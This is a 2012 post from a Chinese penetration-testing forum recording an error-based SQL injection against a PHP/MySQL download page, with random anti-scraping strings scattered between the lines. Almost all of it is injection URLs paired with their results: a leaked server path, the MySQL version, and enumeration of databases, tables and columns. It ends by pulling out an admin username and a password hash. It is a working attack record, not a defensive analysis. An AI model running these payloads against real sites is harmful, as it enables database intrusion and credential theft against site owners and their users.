中国网络渗透测试联盟
标题:
php+mysql高级爆错注入经测算有效
[打印本页]
作者:
admin
时间:
2012-9-13 17:52
标题:
php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
( s4 @' z6 G4 d9 q) h
1 b# C" |, F" @! f+ _! `/ x$ c
之前想找个测试 没想到这有 可以测试下做个记录而已
! N' R. c, K( {9 o9 o
8 [/ G \+ A& k& W8 w' U4 B2 y
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
8 X1 d+ N& P& A2 g! q$ u A1 r
! a0 M+ ]1 f% y5 L9 w" n7 e# P: F
/data0/htdocs/leqi_new/app/myapp.php
+ n% G$ b" W0 j. u: g) J; {
/ c+ F8 E' d; ?+ L
或者
' r1 ~8 {2 t7 D! K( ?
: f( g" i6 N& r/ B
/**********version()**********/ 5.1.49-log
2 l6 e# ]' |" _+ t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" W$ V# m0 ~# z) G. W! y- v
+ Y1 m0 C; r. z+ \ t" e, V6 Z' b B
/**********user()**********/
4 i7 e2 C. o% b J& H, ]% l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# F! n7 B( L! l
) }! Y/ E' `: ?; ^2 I0 q
/**********database()**********/ leqi
5 B: w+ N6 |& p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
+ v* q* p, j: Z/ m
0 X1 d! q8 n; k: j4 i9 U
/**********limit依次递归爆库**********/
. k# X, z; j# a5 _3 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' T5 T: z p2 l/ v$ r$ E
information_schema
/ h$ X( z* {8 [3 ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) c7 ~% K) K1 {+ r( I a
leqi
; Q N$ S; B: D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. _% W& }: i* v- O* P& C8 d
test
$ j( E+ ^* ?5 l, @/ z1 q# g' I
7 K: s) A+ k5 f
/**********limit依次递归爆表名**********/
+ Y( \) |9 _' @! B5 J; z0 j
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) W4 h* |/ l: l$ C
users
* Z3 L. @+ ~/ A0 W/ s* x$ c2 E
6 W% d/ k* \" c. q# h
/**********limit依次递归爆字段名**********/
5 F w4 a" a% [+ e9 Q& W0 T# L4 z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; x1 n+ K5 r) ?+ r, I! ~
user_id,username,nickname,passwd,group_id
/ L T4 m+ m8 W: e( k! g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, u" V; h* U* Z5 A$ h* Y
/wapc/5000_0005_003
3 z' x% Y. {$ `4 F" [
11 21
z; S6 ~. E1 b% B8 t0 i% o7 e
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 Y4 I( y% x! x$ Y( Z# m& O
/wapc/5000_0005_003
D8 r# B% `* N8 E0 {: t. X
11 341 351 361
7 z" L6 A+ Q; E1 N, Y
/**********爆数据**********/
/ W: b- @ v3 V3 T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- X* w' Q. ?0 j6 ^5 J H
admin
& P% V s4 O& F% Y- L
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# k+ L! Q5 m( _6 q$ u2 m* y- h* @
6a8b4574ca231eb8bd52764d4978ffcd
7 D, A2 p2 l. }/ n% W) V
8 M3 j$ Y- w) O: t# L
/ o7 q8 T9 S4 X; {9 X4 s, g3 a
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2